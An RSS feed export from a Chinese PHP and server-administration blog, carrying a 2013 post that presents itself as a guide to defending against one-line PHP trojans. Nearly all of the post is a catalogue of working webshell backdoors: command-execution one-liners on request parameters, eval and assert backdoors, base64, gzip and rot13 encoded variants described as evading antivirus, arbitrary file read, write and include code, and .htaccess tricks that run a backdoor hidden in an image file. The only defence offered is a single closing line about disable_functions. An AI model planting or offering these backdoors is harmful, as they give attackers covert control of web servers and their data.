<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title><![CDATA[沧海一粟]]></title> 
<link>http://www.dzhope.com/index.php</link> 
<description><![CDATA[Web系统架构与服务器运维,php开发]]></description> 
<language>zh-cn</language> 
<copyright><![CDATA[沧海一粟]]></copyright>
<item>
<link>http://www.dzhope.com/post//</link>
<title><![CDATA[PHP木马大全 一句话的PHP木马的防范]]></title> 
<author>jed &lt;jed521@163.com&gt;</author>
<category><![CDATA[服务器技术]]></category>
<pubDate>Tue, 04 Jun 2013 15:37:24 +0000</pubDate> 
<guid>http://www.dzhope.com/post//</guid> 
<description>
<![CDATA[ 
	php后门木马常用的函数大致上可分为四种类型： <br/>　　1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open <br/>　　2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13 <br/>　　3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite <br/>　　4. .htaccess: SetHandler, auto_prepend_file, auto_append_file <br/>　　1. 执行系统命令: <br/>　　system 函数 <br/>　　//test.php?cmd=ls <br/>　　system($_GET[cmd]); <br/>　　passthru 函数 <br/>　　//test.php?cmd=ls <br/>　　passthru($_GET[cmd]); <br/>　　shell_exec 函数 <br/>　　//test.php?cmd=ls <br/>　　echo shell_exec($_GET[cmd]); <br/>　　exec 函数 <br/>　　//test.php?cmd=ls <br/>　　$arr = array(); <br/>　　exec($_GET[cmd],$arr); <br/>　　print_r($arr); <br/>　　popen 函数 <br/>　　//test.php?cmd=ls <br/>　　$handle = popen(&#039;$_GET[cmd], &#039;r&#039;); <br/>　　$read = fread($handle, 2096); <br/>　　echo $read; <br/>　　pclose($handle); <br/>　　proc_open 函数 <br/>　　//test.php?cmd=ls <br/>　　$descriptorspec = array( <br/>　　0 =&gt; array(&#039;pipe&#039;, &#039;r&#039;), <br/>　　1 =&gt; array(&#039;pipe&#039;, &#039;w&#039;), <br/>　　2 =&gt; array(&#039;pipe&#039;, &#039;w&#039;), <br/>　　); <br/>　　$proc = @proc_open($_GET[cmd], $descriptorspec, $pipes); <br/>　　fclose($pipes[0]); <br/>　　$output = array(); <br/>　　while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1],1024),&quot;&#92;n&quot;)); <br/>　　print_r($output); <br/>　　2. 代码执行与加密: <br/>　　eval 函数 <br/>　　//最常见的一句话木马 <br/>　　eval($_POST[cmd]); <br/>　　base64_decode 函数 <br/>　　//为了免杀及隐藏而加密代码 <br/>　　//密文: eval($_POST[&#039;cmd&#039;]); <br/>　　eval(base64_decode(&#039;ZXZhbCgkX1BPU1RbJ2NtZCddKTs=&#039;)); <br/>　　gzinflate 函数 <br/>　　//为了免杀及隐藏而加密代码 <br/>　　//密文: eval($_POST[&#039;cmd&#039;]); <br/>　　eval(gzinflate(base64_decode(&#039;Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==&#039;))); <br/>　　gzuncompress 函数 <br/>　　//为了免杀及隐藏而加密代码 <br/>　　//密文: eval($_POST[&#039;cmd&#039;]); <br/>　　eval(gzuncompress(base64_decode(&#039;eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==&#039;))); <br/>　　gzdecode 函数 <br/>　　//为了免杀及隐藏而加密代码 <br/>　　//密文: eval($_POST[&#039;cmd&#039;]); <br/>　　eval(gzdecode(base64_decode(&#039;H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==&#039;))); <br/>　　str_rot13 函数 <br/>　　//为了免杀及隐藏而加密代码 <br/>　　//密文: eval($_POST[cmd]); <br/>　　eval(str_rot13(&#039;riny($_CBFG[pzq]);&#039;)); <br/>　　assert 函数 <br/>　　//类似eval函数 <br/>　　assert($_POST[cmd]); <br/>　　call_user_func 函数 <br/>　　//使用call_user_func调用assert <br/>　　call_user_func(&#039;assert&#039;,$_POST[cmd]); <br/>　　call_user_func 函数 <br/>　　//使用call_user_func调用任意函数 <br/>　　//test.php?a=assert&amp;cmd=phpinfo() <br/>　　call_user_func($_GET[a],$_REQUEST[cmd]); <br/>　　组合代码 <br/>　　//组合方式调用任意函数 <br/>　　//test.php?a=assert&amp;cmd=phpinfo() <br/>　　$_GET[a]($_REQUEST[cmd]); <br/>　　3. 文件包含与生成: <br/>　　require 函数 <br/>　　//包含任意文件 <br/>　　//test.php?file=123.jpg <br/>　　require($_GET[file]); <br/>　　require_once 函数 <br/>　　//包含任意文件 <br/>　　//test.php?file=123.jpg <br/>　　require_once($_GET[file]); <br/>　　include 函数 <br/>　　//包含任意文件 www.jb51.net <br/>　　//test.php?file=123.jpg <br/>　　include($_GET[file]); <br/>　　include_once 函数 <br/>　　//包含任意文件 <br/>　　//test.php?file=123.jpg <br/>　　include_once($_GET[file]); <br/>　　file_get_contents 函数 <br/>　　//读取任意文件 <br/>　　//test.php?f=config.inc.php <br/>　　echo file_get_contents($_GET[&#039;f&#039;]); <br/>　　file_put_contents 函数 <br/>　　//生成任意内容文件 <br/>　　//a=test.php&amp;b= <br/>　　file_put_contents($_GET[a],$_GET[b]); <br/>　　fputs 函数 <br/>　　//生成任意内容文件 <br/>　　//a=test.php&amp;b= <br/>　　fputs(fopen($_GET[a],&quot;w&quot;),$_GET[b]); <br/>　　4. .htaccess: <br/>　　SetHandler <br/>　　//可将php代码存于非php后缀文件,例: x.jpg <br/>　　//将以下代码写入.htaccess中 <br/>　　//连接x.jpg即可启动后门木马出处www.admin8.us <br/>　　 <br/>　　SetHandler application/x-httpd-php <br/>　　 <br/>　　auto_prepend_file <br/>　　//可将php代码存于非php后缀文件,例: 123.gif <br/>　　//将以下代码写入.htaccess中, 文件路径必须是绝对路径 <br/>　　//访问网站上任何php文件都会启动该php后门木马 <br/>　　//可在不更改站点源代码的情况下记录所有$_REQUEST的值，也可批量挂马 <br/>　　php_value auto_prepend_file c:/apache2/htdocs/123.gif <br/>　　auto_append_file <br/>　　//类似auto_prepend_file <br/>　　//可将php代码存于非php后缀文件,例: 123.gif <br/>　　//将以下代码写入.htaccess中, 文件路径必须是绝对路径 <br/>　　//访问网站上任何php文件都会启动该php后门木马 <br/>　　php_value auto_append_file c:/apache2/htdocs/123.gif <br/>防范方法：通过禁止危险函数 php.ini中设置disable_functions详情可以参考下 http://www.jb51.net/article/19292.htm<br/>Tags - <a href="http://www.dzhope.com/tags/php/" rel="tag">php</a> , <a href="http://www.dzhope.com/tags/php%25E6%259C%25A8%25E9%25A9%25AC/" rel="tag">php木马</a>
]]>
</description>
</item><item>
<link>http://www.dzhope.com/post//#blogcomment</link>
<title><![CDATA[[评论] PHP木马大全 一句话的PHP木马的防范]]></title> 
<author> &lt;user@domain.com&gt;</author>
<category><![CDATA[评论]]></category>
<pubDate>Thu, 01 Jan 1970 00:00:00 +0000</pubDate> 
<guid>http://www.dzhope.com/post//#blogcomment</guid> 
<description>
<![CDATA[ 
	
]]>
</description>
</item>
</channel>
</rss>